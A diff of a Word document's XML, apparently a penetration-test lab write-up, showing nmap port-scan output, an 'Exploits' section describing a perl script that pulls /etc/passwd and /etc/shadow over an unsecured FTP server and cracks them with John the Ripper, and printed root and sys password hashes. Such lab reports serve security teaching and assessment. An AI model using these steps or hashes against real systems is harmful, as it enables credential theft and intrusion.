+          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Consolas" w:cs="Consolas"/>
+          <w:color w:val="CCCCCC"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+        <w:t>distccd</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="line"/>
+          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Consolas" w:cs="Consolas"/>
+          <w:color w:val="CCCCCC"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+        <w:br/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="line"/>
+          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Consolas" w:cs="Consolas"/>
+          <w:color w:val="CCCCCC"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+        <w:t xml:space="preserve">5432/tcp  open  </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="line"/>
+          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Consolas" w:cs="Consolas"/>
+          <w:color w:val="CCCCCC"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+        <w:t>postgresql</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="line"/>
+          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Consolas" w:cs="Consolas"/>
+          <w:color w:val="CCCCCC"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+        <w:br/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="line"/>
+          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Consolas" w:cs="Consolas"/>
+          <w:color w:val="CCCCCC"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+        <w:t xml:space="preserve">5900/tcp  open  </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="line"/>
+          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Consolas" w:cs="Consolas"/>
+          <w:color w:val="CCCCCC"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+        <w:t>vnc</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="line"/>
+          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Consolas" w:cs="Consolas"/>
+          <w:color w:val="CCCCCC"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+        <w:br/>
+      </w:r>
       <w:r>
         <w:rPr>
           <w:rStyle w:val="line"/>
@@ -1318,83 +1357,90 @@
         </w:rPr>
         <w:t>6000/tcp  open  X11</w:t>
       </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="HTMLPreformatted"/>
-        <w:pBdr>
-          <w:top w:val="single" w:sz="48" w:space="0" w:color="121314"/>
-          <w:left w:val="single" w:sz="48" w:space="0" w:color="121314"/>
-          <w:bottom w:val="single" w:sz="48" w:space="0" w:color="121314"/>
-          <w:right w:val="single" w:sz="48" w:space="0" w:color="121314"/>
-        </w:pBdr>
-        <w:shd w:val="clear" w:color="auto" w:fill="121314"/>
-        <w:rPr>
-          <w:rStyle w:val="line"/>
-          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Consolas" w:cs="Consolas"/>
-          <w:color w:val="CCCCCC"/>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="line"/>
-          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Consolas" w:cs="Consolas"/>
-          <w:color w:val="CCCCCC"/>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-        </w:rPr>
-        <w:t>6667/tcp  open  irc</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="HTMLPreformatted"/>
-        <w:pBdr>
-          <w:top w:val="single" w:sz="48" w:space="0" w:color="121314"/>
-          <w:left w:val="single" w:sz="48" w:space="0" w:color="121314"/>
-          <w:bottom w:val="single" w:sz="48" w:space="0" w:color="121314"/>
-          <w:right w:val="single" w:sz="48" w:space="0" w:color="121314"/>
-        </w:pBdr>
-        <w:shd w:val="clear" w:color="auto" w:fill="121314"/>
-        <w:rPr>
-          <w:rStyle w:val="line"/>
-          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Consolas" w:cs="Consolas"/>
-          <w:color w:val="CCCCCC"/>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="line"/>
-          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Consolas" w:cs="Consolas"/>
-          <w:color w:val="CCCCCC"/>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-        </w:rPr>
-        <w:t>6697/tcp  open  ircs-u</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="HTMLPreformatted"/>
-        <w:pBdr>
-          <w:top w:val="single" w:sz="48" w:space="0" w:color="121314"/>
-          <w:left w:val="single" w:sz="48" w:space="0" w:color="121314"/>
-          <w:bottom w:val="single" w:sz="48" w:space="0" w:color="121314"/>
-          <w:right w:val="single" w:sz="48" w:space="0" w:color="121314"/>
-        </w:pBdr>
-        <w:shd w:val="clear" w:color="auto" w:fill="121314"/>
-        <w:rPr>
-          <w:rStyle w:val="line"/>
-          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Consolas" w:cs="Consolas"/>
-          <w:color w:val="CCCCCC"/>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-        </w:rPr>
-      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="line"/>
+          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Consolas" w:cs="Consolas"/>
+          <w:color w:val="CCCCCC"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+        <w:br/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="line"/>
+          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Consolas" w:cs="Consolas"/>
+          <w:color w:val="CCCCCC"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+        <w:t xml:space="preserve">6667/tcp  open  </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="line"/>
+          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Consolas" w:cs="Consolas"/>
+          <w:color w:val="CCCCCC"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+        <w:t>irc</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="line"/>
+          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Consolas" w:cs="Consolas"/>
+          <w:color w:val="CCCCCC"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+        <w:br/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="line"/>
+          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Consolas" w:cs="Consolas"/>
+          <w:color w:val="CCCCCC"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+        <w:t xml:space="preserve">6697/tcp  open  </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="line"/>
+          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Consolas" w:cs="Consolas"/>
+          <w:color w:val="CCCCCC"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+        <w:t>ircs</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="line"/>
+          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Consolas" w:cs="Consolas"/>
+          <w:color w:val="CCCCCC"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+        <w:t>-u</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="line"/>
+          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Consolas" w:cs="Consolas"/>
+          <w:color w:val="CCCCCC"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+        <w:br/>
+      </w:r>
       <w:r>
         <w:rPr>
           <w:rStyle w:val="line"/>
@@ -1405,25 +1451,16 @@
         </w:rPr>
         <w:t>8009/tcp  open  ajp13</w:t>
       </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="HTMLPreformatted"/>
-        <w:pBdr>
-          <w:top w:val="single" w:sz="48" w:space="0" w:color="121314"/>
-          <w:left w:val="single" w:sz="48" w:space="0" w:color="121314"/>
-          <w:bottom w:val="single" w:sz="48" w:space="0" w:color="121314"/>
-          <w:right w:val="single" w:sz="48" w:space="0" w:color="121314"/>
-        </w:pBdr>
-        <w:shd w:val="clear" w:color="auto" w:fill="121314"/>
-        <w:rPr>
-          <w:rStyle w:val="line"/>
-          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Consolas" w:cs="Consolas"/>
-          <w:color w:val="CCCCCC"/>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-        </w:rPr>
-      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="line"/>
+          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Consolas" w:cs="Consolas"/>
+          <w:color w:val="CCCCCC"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+        <w:br/>
+      </w:r>
       <w:r>
         <w:rPr>
           <w:rStyle w:val="line"/>
@@ -1434,54 +1471,48 @@
         </w:rPr>
         <w:t>8180/tcp  open  unknown</w:t>
       </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="HTMLPreformatted"/>
-        <w:pBdr>
-          <w:top w:val="single" w:sz="48" w:space="0" w:color="121314"/>
-          <w:left w:val="single" w:sz="48" w:space="0" w:color="121314"/>
-          <w:bottom w:val="single" w:sz="48" w:space="0" w:color="121314"/>
-          <w:right w:val="single" w:sz="48" w:space="0" w:color="121314"/>
-        </w:pBdr>
-        <w:shd w:val="clear" w:color="auto" w:fill="121314"/>
-        <w:rPr>
-          <w:rStyle w:val="line"/>
-          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Consolas" w:cs="Consolas"/>
-          <w:color w:val="CCCCCC"/>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="line"/>
-          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Consolas" w:cs="Consolas"/>
-          <w:color w:val="CCCCCC"/>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-        </w:rPr>
-        <w:t>8787/tcp  open  msgsrvr</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="HTMLPreformatted"/>
-        <w:pBdr>
-          <w:top w:val="single" w:sz="48" w:space="0" w:color="121314"/>
-          <w:left w:val="single" w:sz="48" w:space="0" w:color="121314"/>
-          <w:bottom w:val="single" w:sz="48" w:space="0" w:color="121314"/>
-          <w:right w:val="single" w:sz="48" w:space="0" w:color="121314"/>
-        </w:pBdr>
-        <w:shd w:val="clear" w:color="auto" w:fill="121314"/>
-        <w:rPr>
-          <w:rStyle w:val="line"/>
-          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Consolas" w:cs="Consolas"/>
-          <w:color w:val="CCCCCC"/>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-        </w:rPr>
-      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="line"/>
+          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Consolas" w:cs="Consolas"/>
+          <w:color w:val="CCCCCC"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+        <w:br/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="line"/>
+          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Consolas" w:cs="Consolas"/>
+          <w:color w:val="CCCCCC"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+        <w:t xml:space="preserve">8787/tcp  open  </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="line"/>
+          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Consolas" w:cs="Consolas"/>
+          <w:color w:val="CCCCCC"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+        <w:t>msgsrvr</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="line"/>
+          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Consolas" w:cs="Consolas"/>
+          <w:color w:val="CCCCCC"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+        <w:br/>
+      </w:r>
       <w:r>
         <w:rPr>
           <w:rStyle w:val="line"/>
@@ -1492,25 +1523,16 @@
         </w:rPr>
         <w:t>33686/tcp open  unknown</w:t>
       </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="HTMLPreformatted"/>
-        <w:pBdr>
-          <w:top w:val="single" w:sz="48" w:space="0" w:color="121314"/>
-          <w:left w:val="single" w:sz="48" w:space="0" w:color="121314"/>
-          <w:bottom w:val="single" w:sz="48" w:space="0" w:color="121314"/>
-          <w:right w:val="single" w:sz="48" w:space="0" w:color="121314"/>
-        </w:pBdr>
-        <w:shd w:val="clear" w:color="auto" w:fill="121314"/>
-        <w:rPr>
-          <w:rStyle w:val="line"/>
-          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Consolas" w:cs="Consolas"/>
-          <w:color w:val="CCCCCC"/>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-        </w:rPr>
-      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="line"/>
+          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Consolas" w:cs="Consolas"/>
+          <w:color w:val="CCCCCC"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+        <w:br/>
+      </w:r>
       <w:r>
         <w:rPr>
           <w:rStyle w:val="line"/>
@@ -1521,25 +1543,16 @@
         </w:rPr>
         <w:t>41710/tcp open  unknown</w:t>
       </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="HTMLPreformatted"/>
-        <w:pBdr>
-          <w:top w:val="single" w:sz="48" w:space="0" w:color="121314"/>
-          <w:left w:val="single" w:sz="48" w:space="0" w:color="121314"/>
-          <w:bottom w:val="single" w:sz="48" w:space="0" w:color="121314"/>
-          <w:right w:val="single" w:sz="48" w:space="0" w:color="121314"/>
-        </w:pBdr>
-        <w:shd w:val="clear" w:color="auto" w:fill="121314"/>
-        <w:rPr>
-          <w:rStyle w:val="line"/>
-          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Consolas" w:cs="Consolas"/>
-          <w:color w:val="CCCCCC"/>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-        </w:rPr>
-      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="line"/>
+          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Consolas" w:cs="Consolas"/>
+          <w:color w:val="CCCCCC"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+        <w:br/>
+      </w:r>
       <w:r>
         <w:rPr>
           <w:rStyle w:val="line"/>
@@ -1550,25 +1563,16 @@
         </w:rPr>
         <w:t>48661/tcp open  unknown</w:t>
       </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="HTMLPreformatted"/>
-        <w:pBdr>
-          <w:top w:val="single" w:sz="48" w:space="0" w:color="121314"/>
-          <w:left w:val="single" w:sz="48" w:space="0" w:color="121314"/>
-          <w:bottom w:val="single" w:sz="48" w:space="0" w:color="121314"/>
-          <w:right w:val="single" w:sz="48" w:space="0" w:color="121314"/>
-        </w:pBdr>
-        <w:shd w:val="clear" w:color="auto" w:fill="121314"/>
-        <w:rPr>
-          <w:rStyle w:val="line"/>
-          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Consolas" w:cs="Consolas"/>
-          <w:color w:val="CCCCCC"/>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-        </w:rPr>
-      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="line"/>
+          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Consolas" w:cs="Consolas"/>
+          <w:color w:val="CCCCCC"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+        <w:br/>
+      </w:r>
       <w:r>
         <w:rPr>
           <w:rStyle w:val="line"/>
@@ -1619,34 +1623,37 @@
         </w:rPr>
         <w:br/>
       </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="HTMLPreformatted"/>
-        <w:pBdr>
-          <w:top w:val="single" w:sz="48" w:space="0" w:color="121314"/>
-          <w:left w:val="single" w:sz="48" w:space="0" w:color="121314"/>
-          <w:bottom w:val="single" w:sz="48" w:space="0" w:color="121314"/>
-          <w:right w:val="single" w:sz="48" w:space="0" w:color="121314"/>
-        </w:pBdr>
-        <w:shd w:val="clear" w:color="auto" w:fill="121314"/>
-        <w:rPr>
-          <w:rStyle w:val="line"/>
-          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Consolas" w:cs="Consolas"/>
-          <w:color w:val="CCCCCC"/>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="line"/>
-          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Consolas" w:cs="Consolas"/>
-          <w:color w:val="CCCCCC"/>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-        </w:rPr>
-        <w:t>Nmap done: 1 IP address (1 host up) scanned in 3.83 seconds</w:t>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="line"/>
+          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Consolas" w:cs="Consolas"/>
+          <w:color w:val="CCCCCC"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+        <w:br/>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="line"/>
+          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Consolas" w:cs="Consolas"/>
+          <w:color w:val="CCCCCC"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+        <w:t>Nmap</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="line"/>
+          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Consolas" w:cs="Consolas"/>
+          <w:color w:val="CCCCCC"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> done: 1 IP address (1 host up) scanned in 3.83 seconds</w:t>
       </w:r>
     </w:p>
     <w:p/>
@@ -1668,7 +1675,7 @@
       <w:pPr>
         <w:pStyle w:val="Heading1"/>
       </w:pPr>
-      <w:bookmarkStart w:id="3" w:name="_Toc528064833"/>
+      <w:bookmarkStart w:id="3" w:name="_Toc528175311"/>
       <w:r>
         <w:lastRenderedPageBreak/>
         <w:t>Exploits</w:t>
@@ -1679,7 +1686,7 @@
       <w:pPr>
         <w:pStyle w:val="Heading2"/>
       </w:pPr>
-      <w:bookmarkStart w:id="4" w:name="_Toc528064834"/>
+      <w:bookmarkStart w:id="4" w:name="_Toc528175312"/>
       <w:r>
         <w:t>Unsecured FTP server</w:t>
       </w:r>
@@ -1697,72 +1704,54 @@
     </w:p>
     <w:p>
       <w:r>
-        <w:t>I then made a perl script that downloads `/etc/passwd/` and `/etc/shadow` into the `./out/` folder, and then unshadows and cracks those files using John the Ripper.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Heading2"/>
-      </w:pPr>
-      <w:bookmarkStart w:id="5" w:name="_Hlk528003517"/>
-      <w:bookmarkStart w:id="6" w:name="_Toc528064835"/>
-      <w:r>
-        <w:t>ccproxy</w:t>
-      </w:r>
-      <w:bookmarkStart w:id="7" w:name="_Hlk528003516"/>
-      <w:r>
-        <w:t>-ftp</w:t>
-      </w:r>
-      <w:bookmarkEnd w:id="5"/>
-      <w:bookmarkEnd w:id="7"/>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:hyperlink r:id="rId5" w:history="1">
-        <w:r>
-          <w:rPr>
-            <w:rStyle w:val="Hyperlink"/>
-          </w:rPr>
-          <w:t>buffer overflow</w:t>
-        </w:r>
-        <w:bookmarkEnd w:id="6"/>
-      </w:hyperlink>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t>In the same vein (ftp) of services, I saw ccproxy-ftp running, and decided to go on Google to see if there were any exploits available.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t xml:space="preserve">Luckily for me, there was a </w:t>
-      </w:r>
-      <w:hyperlink r:id="rId6" w:history="1">
-        <w:r>
-          <w:rPr>
-            <w:rStyle w:val="Hyperlink"/>
-          </w:rPr>
-          <w:t>metasploit module</w:t>
-        </w:r>
-      </w:hyperlink>
-      <w:r>
-        <w:t xml:space="preserve"> available that I could take advantage of.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t xml:space="preserve">There is an </w:t>
-      </w:r>
-      <w:hyperlink r:id="rId7" w:history="1">
-        <w:r>
-          <w:rPr>
-            <w:rStyle w:val="Hyperlink"/>
-          </w:rPr>
-          <w:t>asciinema screen recording</w:t>
-        </w:r>
-      </w:hyperlink>
-      <w:r>
-        <w:t>.</w:t>
+        <w:t xml:space="preserve">I then made a </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>perl</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> script that downloads `/</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>etc</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t>/</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>passwd</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t>/` and `/</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>etc</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t>/shadow` into the `</w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>./</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:t>out/` folder, and then unshadows and cracks those files using John the Ripper.</w:t>
+      </w:r>
+      <w:r>
+        <w:br/>
+      </w:r>
+      <w:r>
+        <w:br/>
+        <w:t>Below is an excerpt from the `shadow` file.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -1777,12 +1766,229 @@
         <w:shd w:val="clear" w:color="auto" w:fill="121314"/>
         <w:spacing w:line="320" w:lineRule="atLeast"/>
         <w:rPr>
+          <w:rStyle w:val="line"/>
+          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Consolas" w:cs="Consolas"/>
+          <w:color w:val="CCCCCC"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="line"/>
+          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Consolas" w:cs="Consolas"/>
+          <w:color w:val="CCCCCC"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+        <w:t>root:$1$/avpfBJ1$x0z8w5UF9Iv./DR9E9Lid.:14747:0:99999:7:::</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="line"/>
+          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Consolas" w:cs="Consolas"/>
+          <w:color w:val="CCCCCC"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+        <w:br/>
+        <w:t>daemon:*:14684:0:99999:7:::</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="line"/>
+          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Consolas" w:cs="Consolas"/>
+          <w:color w:val="CCCCCC"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+        <w:br/>
+        <w:t>bin:*:14684:0:99999:7:::</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="line"/>
+          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Consolas" w:cs="Consolas"/>
+          <w:color w:val="CCCCCC"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+        <w:br/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="line"/>
+          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Consolas" w:cs="Consolas"/>
+          <w:color w:val="CCCCCC"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+        <w:t>sys:$1$fUX6BPOt$Miyc3UpOzQ</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="line"/>
+          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Consolas" w:cs="Consolas"/>
+          <w:color w:val="CCCCCC"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+        <w:t>Jqz4s5wFD9l0:14742:0:99999:7:::</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="line"/>
+          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Consolas" w:cs="Consolas"/>
+          <w:color w:val="CCCCCC"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+        <w:br/>
+        <w:t>sync:*:14684:0:99999:7:::</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="line"/>
+          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Consolas" w:cs="Consolas"/>
+          <w:color w:val="CCCCCC"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+        <w:br/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="line"/>
